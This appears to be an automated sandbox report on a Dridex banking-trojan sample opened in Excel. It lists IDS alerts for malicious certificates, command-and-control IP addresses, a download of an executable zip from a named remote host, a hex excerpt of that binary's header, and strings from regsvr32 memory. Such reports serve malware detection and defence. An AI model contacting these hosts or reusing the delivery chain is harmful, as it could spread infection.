Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49298
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49296
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49300
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49302
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49301
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49306
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49307
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49314
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49318
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49317
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49319
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49320
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49321
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49322
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49325

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 69.164.207.140:3388
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.57.200.100:3786

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Jan 2021 15:03:27 GMTServer: ApacheLast-Modified: Sat, 19 May 2018 08:09:45 GMTAccept-Ranges: bytesContent-Length: 856064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2b f5 15 8c 6f 94 7b df 6f 94 7b df 6f 94 7b df 0a f2 78 de 62 94 7b df 0a f2 7e de e4 94 7b df 0a f2 7f de 78 94 7b df a4 fb 7e de 4d 94 7b df a4 fb 7f de 7f 94 7b df a4 fb 78 de 79 94 7b df db 08 94 df 6a 94 7b df 6f 94 7a df 3b 94 7b df a4 fb 72 de 6e 94 7b df a4 fb 7b de 6e 94 7b df a4 fb 84 df 6e 94 7b df a4 fb 79 de 6e 94 7b df 52 69 63 68 6f 94 7b df 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 df 94 d5 5d 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 74 07 00 00 e4 06 00 00 00 00 00 08 d2 05 00 00 10 00 00 00 90 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 0e 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 df 0c 00 64 00 00 00 34 e0 0c 00 50 00 00 00 00 50 0e 00 08 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0e 00 08 27 00 00 7c bb 0c 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 bb 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 72 07 00 00 10 00 00 00 74 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 58 05 00 00 90 07 00 00 5a 05 00 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 5b 01 00 00 f0 0c 00 00 10 00 00 00 d2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 05 00 00 00 50 0e 00 00 06 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 27 00 00 00 60 0e 00 00 28 00 00 00 e8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 69.164.207.140 69.164.207.140
Source: Joe Sandbox View	IP Address: 211.110.44.63 211.110.44.63

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /hknmwj.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stellarum.com.brConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64C1FA3.emf

Jump to behavior

Source: global traffic

Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comF equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: qsf.surfescape.net

Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp	String found in binary or memory: http://crl.co
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabEK
Source: regsvr32.exe, 00000011.00000002.2492560886.000000000053C000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabb
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enL
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
Source: regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enn
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2105222828.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2120262017.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2121003757.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2458603358.0000000001DA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2510481818.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2253344660.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000F.00000002.2253526662.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2440450809.0000000001CB0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/C
Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/P
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/X
